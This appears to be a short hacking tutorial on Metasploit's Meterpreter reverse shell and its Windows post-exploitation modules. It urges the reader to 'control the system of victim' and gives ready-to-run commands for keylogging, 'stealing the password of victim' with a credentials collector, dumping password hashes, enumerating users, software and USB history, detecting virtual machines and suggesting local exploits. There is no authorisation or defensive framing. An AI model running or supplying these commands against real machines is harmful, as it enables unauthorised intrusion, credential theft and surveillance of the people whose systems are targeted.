Meterpreter Shell:
Meterprete shell is obtained after hacking a machine or exploit the vulnerability. Meterpreter shell is a reverse shell that is used to control the system of victim after hacking it. It is a part of Metasploit and it has lot of commands to control the system of victim. We can exploit multiple vulnerabilities, can make changes in system of victim, can install or uninstall apps or software and much more. In the figure commands of meterpreter shell are shown. So enjoy meterpreter shell and control the system of victim. Type command (help) to see the all commands and their use in meterpreter shell to control the target.
Some meterprete commands and their use
Post Exploits in Metasploit:
These are exploits that are used to find different details of system of victim data of victim. Mostly used after getting meterpreter shell for different tasks.
1) KEYLOGGER RECORDING:
We can record the button pressed by victim by using Metasploit. Mostly passwords are captured by this method. So, we can do this using a post module after getting meterpreter shell using following command;
(run post/windows/capture/keylog_recorder)
Then open the given file to capture the keys of victim.
2) FOR ARP SCANNING:
Run this command to get arp scanning detail after getting meterpreter shell;
(run post/windows/gather/arp_scanner)
3) CHECKING VIRTUAL MACHINES DETAIL:
Run following command to see that target system is running on virtual box or vmware.
Run this command to check;
(run post/windows/gather/checkvm)
4) STEALING THE PASSWORD OF VICTIM:
We can steal the passwords of victim by using following post module in meterpreter shell;
(run post/windows/gather/credentials/credentials_collector)
5) FINDING THE INSTALLED SOFTWARE OF TARGET WINDOW SYSTEM:
We can find the names of installed software of victim by using following post module in meterpreter;
(run post/windows/gather/enum_applications)
6) FINDING THE USERS OF TARGET SYSTEM:
We can find the users oftarget with their SIDs by using following post module in meterpreter shell;
(run post/windows/gather/enum_logged_on_users)
7) FINDING THE USB HISTORY OF TARGET:
We can run usb_history of target as;
(run post/windows/gather/usb_history)
8) CAPTURING THE HASH PASSWORDS OF TARGET:
We can capture the hashes of passwords by using following post module in meterpreter;
(run post/windows/gather/hashdump)
9) FINDING EXPLOITS FOR TARGET;
We can find exploits for target by using following post module in meterpreter;
(run post/multi/recon/local_exploit_suggester)